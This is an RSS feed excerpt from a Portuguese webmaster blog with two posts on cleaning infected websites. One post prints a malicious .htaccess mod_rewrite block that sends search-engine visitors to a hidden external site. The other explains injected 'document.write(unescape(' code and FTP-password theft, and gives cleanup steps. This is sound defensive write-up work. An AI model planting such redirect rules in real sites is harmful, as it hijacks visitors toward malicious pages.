Fodi.me MEO Passwords » virus http://fodi.me dlink and meo passwords Mon, 21 May 2012 19:38:15 +0000 en hourly 1 http://wordpress.org/?v=3.3.2 Virus em ficheiros .htaccess http://fodi.me/virus-em-ficheiros-htaccess/ http://fodi.me/virus-em-ficheiros-htaccess/#comments Wed, 01 Apr 2009 20:26:14 +0000 OBH http://fodi.me/?p=254 Com algum espanto hoje verifiquei que um site que fiz tinha virus, corri e percorri o codigo todo sem encontrar nada em concreto, até que ao fim de umas horas decidi começar a verificar ficheiro por ficheiro em cada pasta incluindo o .htaccess onde verifiquei que tinha ficheiros .htaccess com o texto que segue mais abaixo.

Virus utiliza o mod_rewrite infectando htaccess

É claro que eu ao visitar o site nunca iria ver o virus, pois o .htaccess faz uso do mod_rewrite do apache para redireccionar os visitantes que chegam ao nosso site a partir dos motores de busca para sites “suspeitos”.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://xxxxxx-xxxxxxx.xxxx [R,L]

A remoção do virus é basntante simples e passa tambem pelo que já expliquei no virus iframe como lhe chamei, passa pela limpeza do computador que no meu caso está “limpo” julgo eu :-) e pela alteração de passwords ftp.

]]> http://fodi.me/virus-em-ficheiros-htaccess/feed/ 3 Ataque IFRAME document.write(unescape( virus http://fodi.me/ataque-iframe-documentwrite-unescape/ http://fodi.me/ataque-iframe-documentwrite-unescape/#comments Wed, 11 Mar 2009 15:57:12 +0000 OBH http://fodi.me/?p=139 virus-ch2Chegou-me à pouco tempo às mão a tarefa de eliminar um virus num website feito em Joomla esse virus infecta todos os index’s html’s e php’s existentes na conta de alojamento.

Na altura pensei que fosse um problema de segurança no Joomla, protegendo as configurações do servidor ao máximo para que o mesmo não volta-se a suceder.

O que se passou é que o virus voltou passados 5 ou 6 dias, dei voltas e voltas e apenas cheguei à conclusão que só podia ser atravez de FTP, uma vez que os logs do apache estavam limpos na hora e data de modificação dos ficheiros.

Como Eliminar?

Passo a explicar mais ou menos a forma de funcionamento do virus.
Ao visitar um site que esteja infectado o virus tenta instalar-se no computador do visitante instalando no mesmo um keylogger que irá fazer um scan às passwords FTP gravadas no PC.
Portanto a maneira de eliminar o vírus passa primeiro por limpar o PC de qualquer vírus existente com um antivírus, ou até em ultimo recurso formatar o computador.

Após o computador limpo eliminar todos os vírus existentes nos html’s e php’s, procurando nos documentos por “document.write(unescape(”

Mudar todas as passwords FTP, usando para o efeito tb passwords com maiusculas minusculas um numero e se possivel um caracter especial

Trata-se de um virus que está a propagar-se bastante podendo o mesmo originar falhas de segurança nos servidores caso começe a instalar codigo malicioso tipo backdoors.

]]> http://fodi.me/ataque-iframe-documentwrite-unescape/feed/ 2